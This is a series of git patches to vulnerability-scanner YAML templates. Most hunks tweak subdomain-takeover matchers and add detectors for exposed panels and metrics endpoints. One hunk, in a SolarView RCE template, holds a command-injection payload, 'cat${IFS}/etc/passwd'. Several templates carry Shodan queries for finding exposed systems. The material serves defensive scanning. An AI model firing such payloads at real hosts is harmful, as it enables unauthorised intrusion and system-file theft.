26106bf138..06b13846f1 100644 --- a/takeovers/netlify-takeover.yaml +++ b/takeovers/netlify-takeover.yaml @@ -17,6 +17,10 @@ requests: matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word part: body words: diff --git a/takeovers/ngrok-takeover.yaml b/takeovers/ngrok-takeover.yaml index db9767e767..c01e997b90 100644 --- a/takeovers/ngrok-takeover.yaml +++ b/takeovers/ngrok-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - ngrok.io not found diff --git a/takeovers/pagewiz-takeover.yaml b/takeovers/pagewiz-takeover.yaml index 0322b92114..fade60169d 100644 --- a/takeovers/pagewiz-takeover.yaml +++ b/takeovers/pagewiz-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - '404 - Page Not Found' diff --git a/takeovers/pantheon-takeover.yaml b/takeovers/pantheon-takeover.yaml index add66bc615..ae5bec6ffe 100644 --- a/takeovers/pantheon-takeover.yaml +++ b/takeovers/pantheon-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - "The gods are wise, but do not know of the site which you seek." \ No newline at end of file diff --git a/takeovers/pingdom-takeover.yaml b/takeovers/pingdom-takeover.yaml index b8e16c4e18..550baa3b6f 100644 --- a/takeovers/pingdom-takeover.yaml +++ b/takeovers/pingdom-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - Public Report Not Activated diff --git a/takeovers/proposify-takeover.yaml b/takeovers/proposify-takeover.yaml index 2cb1bd3646..24c5d63573 100644 --- a/takeovers/proposify-takeover.yaml +++ b/takeovers/proposify-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - If you need immediate assistance, please contact <a href="mailto:support@proposify.biz \ No newline at end of file diff --git a/takeovers/readme-takeover.yaml b/takeovers/readme-takeover.yaml index 78b1a055a4..4a0a6191b5 100644 --- a/takeovers/readme-takeover.yaml +++ b/takeovers/readme-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - 'Project doesnt exist... yet!' diff --git a/takeovers/readthedocs-takeover.yaml b/takeovers/readthedocs-takeover.yaml index 8afb440926..667abcee45 100644 --- a/takeovers/readthedocs-takeover.yaml +++ b/takeovers/readthedocs-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - unknown to Read the Docs \ No newline at end of file diff --git a/takeovers/shopify-takeover.yaml b/takeovers/shopify-takeover.yaml index ecdd1bf00a..dfd3931238 100644 --- a/takeovers/shopify-takeover.yaml +++ b/takeovers/shopify-takeover.yaml @@ -18,6 +18,10 @@ requests: matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - 'To finish setting up your new web address, go to your domain settings, click "Connect existing domain"' diff --git a/takeovers/short-io.yaml b/takeovers/short-io.yaml index d5d6276b81..8f18d19a5c 100644 --- a/takeovers/short-io.yaml +++ b/takeovers/short-io.yaml @@ -12,7 +12,13 @@ requests: - method: GET path: - "{{BaseURL}}" + + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - "Link does not exist" diff --git a/takeovers/simplebooklet-takeover.yaml b/takeovers/simplebooklet-takeover.yaml index d69c304f37..9c401acc39 100644 --- a/takeovers/simplebooklet-takeover.yaml +++ b/takeovers/simplebooklet-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - We can't find this <a href="https://simplebooklet.com \ No newline at end of file diff --git a/takeovers/smartjob-takeover.yaml b/takeovers/smartjob-takeover.yaml index 0aec6d66bc..4a87aceced 100644 --- a/takeovers/smartjob-takeover.yaml +++ b/takeovers/smartjob-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - Job Board Is Unavailable diff --git a/takeovers/smugmug-takeover.yaml b/takeovers/smugmug-takeover.yaml index 294379d0d3..733121b3a8 100644 --- a/takeovers/smugmug-takeover.yaml +++ b/takeovers/smugmug-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - '{"text":"Page Not Found"' \ No newline at end of file diff --git a/takeovers/sprintful-takeover.yaml b/takeovers/sprintful-takeover.yaml index 791e26095d..72924f9332 100644 --- a/takeovers/sprintful-takeover.yaml +++ b/takeovers/sprintful-takeover.yaml @@ -13,9 +13,9 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 + - type: dsl + dsl: + - Host != ip - type: word words: @@ -26,4 +26,8 @@ requests: - type: word words: - - "Sprintful" \ No newline at end of file + - "Sprintful" + + - type: status + status: + - 200 diff --git a/takeovers/strikingly-takeover.yaml b/takeovers/strikingly-takeover.yaml index 808df2d080..aa85db2068 100644 --- a/takeovers/strikingly-takeover.yaml +++ b/takeovers/strikingly-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - "But if you're looking to build your own website" diff --git a/takeovers/surge-takeover.yaml b/takeovers/surge-takeover.yaml index 5ddd987bd0..66774c456b 100644 --- a/takeovers/surge-takeover.yaml +++ b/takeovers/surge-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - project not found \ No newline at end of file diff --git a/takeovers/surveygizmo-takeover.yaml b/takeovers/surveygizmo-takeover.yaml index 4b9d974139..321b67c571 100644 --- a/takeovers/surveygizmo-takeover.yaml +++ b/takeovers/surveygizmo-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - data-html-name \ No newline at end of file diff --git a/takeovers/surveysparrow-takeover.yaml b/takeovers/surveysparrow-takeover.yaml index 81b8449eb4..515d7d2780 100644 --- a/takeovers/surveysparrow-takeover.yaml +++ b/takeovers/surveysparrow-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - "Account not found." diff --git a/takeovers/tave-takeover.yaml b/takeovers/tave-takeover.yaml index c056f8605e..448c576c68 100644 --- a/takeovers/tave-takeover.yaml +++ b/takeovers/tave-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - "<h1>Error 404: Page Not Found</h1>" \ No newline at end of file diff --git a/takeovers/teamwork-takeover.yaml b/takeovers/teamwork-takeover.yaml index 995ef88012..90fef807fe 100644 --- a/takeovers/teamwork-takeover.yaml +++ b/takeovers/teamwork-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - Oops - We didn't find your site. \ No newline at end of file diff --git a/takeovers/tictail-takeover.yaml b/takeovers/tictail-takeover.yaml index b49d1f8f85..7fa5f78c5e 100644 --- a/takeovers/tictail-takeover.yaml +++ b/takeovers/tictail-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - 'Building a brand of your own?' diff --git a/takeovers/tilda-takeover.yaml b/takeovers/tilda-takeover.yaml index 4156cb708d..bbd5974ef4 100644 --- a/takeovers/tilda-takeover.yaml +++ b/takeovers/tilda-takeover.yaml @@ -15,6 +15,10 @@ requests: matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - Please go to the site settings and put the domain name in the Domain tab. diff --git a/takeovers/tumblr-takeover.yaml b/takeovers/tumblr-takeover.yaml index d7fcc324e8..d35862b3ce 100644 --- a/takeovers/tumblr-takeover.yaml +++ b/takeovers/tumblr-takeover.yaml @@ -15,6 +15,10 @@ requests: matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - Whatever you were looking for doesn't currently exist at this address. diff --git a/takeovers/uberflip-takeover.yaml b/takeovers/uberflip-takeover.yaml index cc7c2a3780..d058830fbb 100644 --- a/takeovers/uberflip-takeover.yaml +++ b/takeovers/uberflip-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - "Non-hub domain, The URL you've accessed does not provide a hub." \ No newline at end of file diff --git a/takeovers/uptimerobot-takeover.yaml b/takeovers/uptimerobot-takeover.yaml index 2dcb31e963..c45c61bae4 100644 --- a/takeovers/uptimerobot-takeover.yaml +++ b/takeovers/uptimerobot-takeover.yaml @@ -16,6 +16,10 @@ requests: matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: regex regex: - "^page not found$" diff --git a/takeovers/uservoice-takeover.yaml b/takeovers/uservoice-takeover.yaml index 2e2a81f6cb..cc0cd9b81a 100644 --- a/takeovers/uservoice-takeover.yaml +++ b/takeovers/uservoice-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - "This UserVoice subdomain is currently available!" diff --git a/takeovers/vend-takeover.yaml b/takeovers/vend-takeover.yaml index 0d522e86fa..9514c8c4a5 100644 --- a/takeovers/vend-takeover.yaml +++ b/takeovers/vend-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - Looks like you've traveled too far into cyberspace. \ No newline at end of file diff --git a/takeovers/webflow-takeover.yaml b/takeovers/webflow-takeover.yaml index ac5bea09ac..630171dd35 100644 --- a/takeovers/webflow-takeover.yaml +++ b/takeovers/webflow-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - <p class="description">The page you are looking for doesn't exist or has been moved.</p> \ No newline at end of file diff --git a/takeovers/wishpond-takeover.yaml b/takeovers/wishpond-takeover.yaml index 9836ce3199..2245a4f1b2 100644 --- a/takeovers/wishpond-takeover.yaml +++ b/takeovers/wishpond-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - https://www.wishpond.com/404?campaign=true \ No newline at end of file diff --git a/takeovers/wix-takeover.yaml b/takeovers/wix-takeover.yaml index 7f42a09ee8..047eff4eb4 100644 --- a/takeovers/wix-takeover.yaml +++ b/takeovers/wix-takeover.yaml @@ -16,6 +16,10 @@ requests: matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - 'Error ConnectYourDomain occurred' diff --git a/takeovers/wordpress-takeover.yaml b/takeovers/wordpress-takeover.yaml index 37564739c8..b8b1ef5431 100644 --- a/takeovers/wordpress-takeover.yaml +++ b/takeovers/wordpress-takeover.yaml @@ -15,6 +15,10 @@ requests: matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - "Do you want to register" diff --git a/takeovers/worksites-takeover.yaml b/takeovers/worksites-takeover.yaml index ec9b947009..295a939a21 100644 --- a/takeovers/worksites-takeover.yaml +++ b/takeovers/worksites-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: regex regex: - "(?:Company Not Found|you’re looking for doesn’t exist)" diff --git a/takeovers/wufoo-takeover.yaml b/takeovers/wufoo-takeover.yaml index 6ba76594c7..7b35a9062b 100644 --- a/takeovers/wufoo-takeover.yaml +++ b/takeovers/wufoo-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - Profile not found diff --git a/takeovers/zendesk-takeover.yaml b/takeovers/zendesk-takeover.yaml index 24a8b86c66..d49065c7ee 100644 --- a/takeovers/zendesk-takeover.yaml +++ b/takeovers/zendesk-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - this help center no longer exists \ No newline at end of file From 8292e9824096c9b93c4bbbd4668c646740285c44 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 17 Nov 2022 21:32:12 +0530 Subject: [PATCH 0404/1415] Update CVE-2022-40881.yaml --- cves/2022/CVE-2022-40881.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-40881.yaml b/cves/2022/CVE-2022-40881.yaml index 0d67fc7784..b9b8ed9613 100644 --- a/cves/2022/CVE-2022-40881.yaml +++ b/cves/2022/CVE-2022-40881.yaml @@ -9,9 +9,10 @@ info: reference: - https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40881 + - https://github.com/advisories/GHSA-wx3r-88rg-whxq metadata: shodan-query: http.favicon.hash:"-244067125" - tags: cve,cve2022,solarview,rce + tags: cve,cve2022,solarview,rce,lfi variables: cmd: "cat${IFS}/etc/passwd" From 0423e20dd1ae1723cdf8be923c35d828e4911a5e Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 17 Nov 2022 21:43:47 +0530 Subject: [PATCH 0405/1415] Delete cowrie-honeypot-detect.yaml --- network/cowrie-honeypot-detect.yaml | 32 ----------------------------- 1 file changed, 32 deletions(-) delete mode 100644 network/cowrie-honeypot-detect.yaml diff --git a/network/cowrie-honeypot-detect.yaml b/network/cowrie-honeypot-detect.yaml deleted file mode 100644 index 56a629d83f..0000000000 --- a/network/cowrie-honeypot-detect.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: cowrie-honeypot-detect - -info: - name: Cowrie SSH Honeypot Detect - author: thesubtlety - severity: info - description: | - Cowrie is a medium to high interaction SSH and Telnet honeypot designed to log brute force attacks and the shell interaction performed by the attacker. In medium interaction mode (shell) it emulates a UNIX system in Python, in high interaction mode (proxy) it functions as an SSH and telnet proxy to observe attacker behavior to another system. - reference: - - https://web.archive.org/web/20170826075224/https://morris.sc/detecting-kippo-ssh-honeypots/ - - https://github.com/blazeinfosec/detect-kippo-cowrie/blob/master/detectKippoCowrie.py - - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssh/detect_kippo.rb - tags: network,ssh,honeypot,msf - -network: - - host: - - '{{Hostname}}' - - '{{Host}}:22' - - inputs: - - data: "\n" - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - 'SSH\-([0-9.-A-Za-z_ ]+)' - - - type: word - words: - - Invalid SSH identification string From 3a4655791ba5a243db174182476ac70176c48937 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Thu, 17 Nov 2022 12:47:55 -0500 Subject: [PATCH 0406/1415] Update struts-dev-mode-ognl-injection.yaml --- vulnerabilities/struts-dev-mode-ognl-injection.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/vulnerabilities/struts-dev-mode-ognl-injection.yaml b/vulnerabilities/struts-dev-mode-ognl-injection.yaml index 0b7bfefc3a..2d084402e3 100644 --- a/vulnerabilities/struts-dev-mode-ognl-injection.yaml +++ b/vulnerabilities/struts-dev-mode-ognl-injection.yaml @@ -4,8 +4,11 @@ info: name: Apache Struts Dev Mode OGNL Injection author: tess severity: critical + metadata: + verified: true reference: - https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/ + - https://www.exploit-db.com/exploits/31434 tags: struts,debug,ognl,exposure,apache requests: From d7bba86c864485f1df9672fedfc00a7a57ad0c33 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Thu, 17 Nov 2022 12:48:28 -0500 Subject: [PATCH 0407/1415] Update struts-dev-mode-ognl-injection.yaml --- vulnerabilities/struts-dev-mode-ognl-injection.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/struts-dev-mode-ognl-injection.yaml b/vulnerabilities/struts-dev-mode-ognl-injection.yaml index 2d084402e3..a808fb0ef1 100644 --- a/vulnerabilities/struts-dev-mode-ognl-injection.yaml +++ b/vulnerabilities/struts-dev-mode-ognl-injection.yaml @@ -9,7 +9,7 @@ info: reference: - https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/ - https://www.exploit-db.com/exploits/31434 - tags: struts,debug,ognl,exposure,apache + tags: struts,debug,ognl,exposure,apache,misconfig requests: - method: GET From 19a0804d6ce9ed4c670531b2a314fc986e234070 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 17 Nov 2022 23:21:38 +0530 Subject: [PATCH 0408/1415] Update struts-dev-mode-ognl-injection.yaml --- vulnerabilities/struts-dev-mode-ognl-injection.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/struts-dev-mode-ognl-injection.yaml b/vulnerabilities/struts-dev-mode-ognl-injection.yaml index a808fb0ef1..3e69a94191 100644 --- a/vulnerabilities/struts-dev-mode-ognl-injection.yaml +++ b/vulnerabilities/struts-dev-mode-ognl-injection.yaml @@ -4,12 +4,13 @@ info: name: Apache Struts Dev Mode OGNL Injection author: tess severity: critical - metadata: - verified: true reference: - https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/ - https://www.exploit-db.com/exploits/31434 - tags: struts,debug,ognl,exposure,apache,misconfig + metadata: + verified: true + shodan-query: html:"Struts Problem Report" + tags: apache,struts,ognl,misconfig requests: - method: GET From 4a339c107562bc7a2e03682d369f34d754453597 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Thu, 17 Nov 2022 12:59:42 -0500 Subject: [PATCH 0409/1415] Create np-data-cache.yaml --- misconfiguration/np-data-cache.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/np-data-cache.yaml diff --git a/misconfiguration/np-data-cache.yaml b/misconfiguration/np-data-cache.yaml new file mode 100644 index 0000000000..1928c9d4c7 --- /dev/null +++ b/misconfiguration/np-data-cache.yaml @@ -0,0 +1,28 @@ +id: np-data-cache + +info: + name: NP Data Cache + author: tess + severity: low + metadata: + verified: true + shodan-query: title:"NP Data Cache" + tags: np,panel,misconfig + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "NP Data Cache" + - "Server logs (if subscribed)" + condition: and + + - type: status + status: + - 200 From 749bc6eadbc9e2742bf5d8da44cbd3ed23ab1ab8 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Thu, 17 Nov 2022 13:08:16 -0500 Subject: [PATCH 0410/1415] Update np-data-cache.yaml --- misconfiguration/np-data-cache.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/misconfiguration/np-data-cache.yaml b/misconfiguration/np-data-cache.yaml index 1928c9d4c7..1b3ac208f0 100644 --- a/misconfiguration/np-data-cache.yaml +++ b/misconfiguration/np-data-cache.yaml @@ -1,13 +1,13 @@ id: np-data-cache info: - name: NP Data Cache + name: NP Data Cache Detect author: tess - severity: low + severity: info metadata: verified: true shodan-query: title:"NP Data Cache" - tags: np,panel,misconfig + tags: np,panel,detect requests: - method: GET From bc357158342a2a5ec0043857940f44424bf821bf Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 18 Nov 2022 00:22:32 +0530 Subject: [PATCH 0411/1415] Unauthenticated Mercurial Detect --- misconfiguration/unauth-mercurial-detect.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 misconfiguration/unauth-mercurial-detect.yaml diff --git a/misconfiguration/unauth-mercurial-detect.yaml b/misconfiguration/unauth-mercurial-detect.yaml new file mode 100644 index 0000000000..ea92b54a00 --- /dev/null +++ b/misconfiguration/unauth-mercurial-detect.yaml @@ -0,0 +1,30 @@ +id: unauth-mercurial-detect + +info: + name: Unauthenticated Mercurial Detect + author: pussycat0x + severity: high + metadata: + shodan-query: html:"Mercurial repositories index" + tags: misconfig,unauth,mercurial + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Mercurial Repositories" + - "Name" + - "Description" + - "Contact" + - "Last modified" + condition: and + - type: status + status: + - 200 + From f349c2076bb3cadf1ef38822ff6a066626792a70 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Thu, 17 Nov 2022 13:52:37 -0500 Subject: [PATCH 0412/1415] Create apache-jmeter-dashboard.yaml --- exposed-panels/apache-jmeter-dashboard.yaml | 29 +++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposed-panels/apache-jmeter-dashboard.yaml diff --git a/exposed-panels/apache-jmeter-dashboard.yaml b/exposed-panels/apache-jmeter-dashboard.yaml new file mode 100644 index 0000000000..7e88fb96bf --- /dev/null +++ b/exposed-panels/apache-jmeter-dashboard.yaml @@ -0,0 +1,29 @@ +id: apache-jmeter-dashboard + +info: + name: Apache JMeter Dashboard + author: tess + severity: low + metadata: + verified: true + shodan-query: title:"Apache JMeter Dashboard" + tags: apache,jmeter,panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Apache JMeter Dashboard" + - "Dashboard" + - "Charts" + condition: and + + - type: status + status: + - 200 From 8c024f6ce0afff8bb6a008546dffd12f0d65f5b9 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 18 Nov 2022 00:25:28 +0530 Subject: [PATCH 0413/1415] Update unauth-mercurial-detect.yaml --- misconfiguration/unauth-mercurial-detect.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/misconfiguration/unauth-mercurial-detect.yaml b/misconfiguration/unauth-mercurial-detect.yaml index ea92b54a00..d3f2cda9a9 100644 --- a/misconfiguration/unauth-mercurial-detect.yaml +++ b/misconfiguration/unauth-mercurial-detect.yaml @@ -27,4 +27,3 @@ requests: - type: status status: - 200 - From abe893453ae30d91ddcbf914533bd518931f4a02 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 18 Nov 2022 08:53:29 +0530 Subject: [PATCH 0414/1415] Update and rename unauth-mercurial-detect.yaml to unauth-mercurial.yaml --- .../{unauth-mercurial-detect.yaml => unauth-mercurial.yaml} | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) rename misconfiguration/{unauth-mercurial-detect.yaml => unauth-mercurial.yaml} (83%) diff --git a/misconfiguration/unauth-mercurial-detect.yaml b/misconfiguration/unauth-mercurial.yaml similarity index 83% rename from misconfiguration/unauth-mercurial-detect.yaml rename to misconfiguration/unauth-mercurial.yaml index d3f2cda9a9..123b7557f0 100644 --- a/misconfiguration/unauth-mercurial-detect.yaml +++ b/misconfiguration/unauth-mercurial.yaml @@ -1,4 +1,4 @@ -id: unauth-mercurial-detect +id: unauth-mercurial info: name: Unauthenticated Mercurial Detect @@ -19,10 +19,8 @@ requests: part: body words: - "Mercurial Repositories" - - "Name" - - "Description" - - "Contact" - "Last modified" + condition: and - type: status status: From f1bc46d6fc44dcca14dd5e1d37911644b2abf610 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 18 Nov 2022 09:03:42 +0530 Subject: [PATCH 0416/1415] Update unauth-mercurial.yaml --- misconfiguration/unauth-mercurial.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/misconfiguration/unauth-mercurial.yaml b/misconfiguration/unauth-mercurial.yaml index 123b7557f0..88eb3545af 100644 --- a/misconfiguration/unauth-mercurial.yaml +++ b/misconfiguration/unauth-mercurial.yaml @@ -5,6 +5,7 @@ info: author: pussycat0x severity: high metadata: + verified: true shodan-query: html:"Mercurial repositories index" tags: misconfig,unauth,mercurial From c6fd37cd10830dd8af943ca22d7305a9aef36319 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 18 Nov 2022 03:48:40 +0000 Subject: [PATCH 0417/1415] Auto Generated New Template Addition List [Fri Nov 18 03:48:40 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f22292b227..9d7bc3a1ed 100644 --- a/.new-additions +++ b/.new-additions @@ -20,6 +20,7 @@ misconfiguration/installer/tasmota-install.yaml misconfiguration/phpmemcached-admin-panel.yaml misconfiguration/tasmota-config-webui.yaml misconfiguration/typo3-debug-mode.yaml +misconfiguration/unauth-mercurial.yaml network/detection/dotnet-remoting-service-detect.yaml network/detection/esmtp-detect.yaml network/detection/imap-detect.yaml From 78faad8915ae37d28591760024dbb3fbfb2391e7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 18 Nov 2022 09:23:28 +0530 Subject: [PATCH 0418/1415] Update apache-jmeter-dashboard.yaml --- exposed-panels/apache-jmeter-dashboard.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposed-panels/apache-jmeter-dashboard.yaml b/exposed-panels/apache-jmeter-dashboard.yaml index 7e88fb96bf..8aff125683 100644 --- a/exposed-panels/apache-jmeter-dashboard.yaml +++ b/exposed-panels/apache-jmeter-dashboard.yaml @@ -21,7 +21,6 @@ requests: words: - "Apache JMeter Dashboard" - "Dashboard" - - "Charts" condition: and - type: status From 4487f494cfe8215a95944d98bc4aa49b7862766c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 18 Nov 2022 03:55:29 +0000 Subject: [PATCH 0419/1415] Auto Generated New Template Addition List [Fri Nov 18 03:55:29 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9d7bc3a1ed..2d93ba62fe 100644 --- a/.new-additions +++ b/.new-additions @@ -9,6 +9,7 @@ cves/2022/CVE-2022-2379.yaml cves/2022/CVE-2022-3484.yaml cves/2022/CVE-2022-3578.yaml default-logins/tooljet/tooljet-default-login.yaml +exposed-panels/apache-jmeter-dashboard.yaml exposed-panels/opencpu-panel.yaml exposed-panels/tekton-dashboard.yaml exposed-panels/wagtail-cms-detect.yaml From 7dffde5653cddc96922afe482df7b581e182cb83 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 18 Nov 2022 10:35:36 +0530 Subject: [PATCH 0420/1415] Create pcdn-cache-node.yaml --- misconfiguration/pcdn-cache-node.yaml | 34 +++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 misconfiguration/pcdn-cache-node.yaml diff --git a/misconfiguration/pcdn-cache-node.yaml b/misconfiguration/pcdn-cache-node.yaml new file mode 100644 index 0000000000..c3b52d01c2 --- /dev/null +++ b/misconfiguration/pcdn-cache-node.yaml @@ -0,0 +1,34 @@ +id: pcdn-cache-node + +info: + name: PCDN Cache Node Dataset + author: DhiyaneshDk + severity: low + metadata: + verified: true + shodan-query: title:"PCDN Cache Node Dataset" + tags: node,pcdn,misconfig + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Bandwidth" + - "ReportEventID" + - "ReadDiskDuration" + condition: and + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 From e0b42019a15253de33b6beba3602b87a35de7a91 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 18 Nov 2022 11:09:01 +0530 Subject: [PATCH 0421/1415] Create postgres-exporter-metrics.yaml --- .../postgres-exporter-metrics.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/postgres-exporter-metrics.yaml diff --git a/misconfiguration/postgres-exporter-metrics.yaml b/misconfiguration/postgres-exporter-metrics.yaml new file mode 100644 index 0000000000..344ebf3479 --- /dev/null +++ b/misconfiguration/postgres-exporter-metrics.yaml @@ -0,0 +1,28 @@ +id: postgres-exporter-metrics + +info: + name: Detect Postgres Exporter Metrics + author: DhiyaneshDk + severity: low + metadata: + verified: true + shodan-query: title:"Postgres exporter" + tags: postgres,exposure,debug + +requests: + - method: GET + path: + - "{{BaseURL}}/metrics" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "pg_database_size_bytes" + - "datname" + condition: and + + - type: status + status: + - 200 From 962ff6b3f20a7bba6329fea56111af810f8a3900 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 18 Nov 2022 11:14:22 +0530 Subject: [PATCH 0422/1415] Add files via upload --- 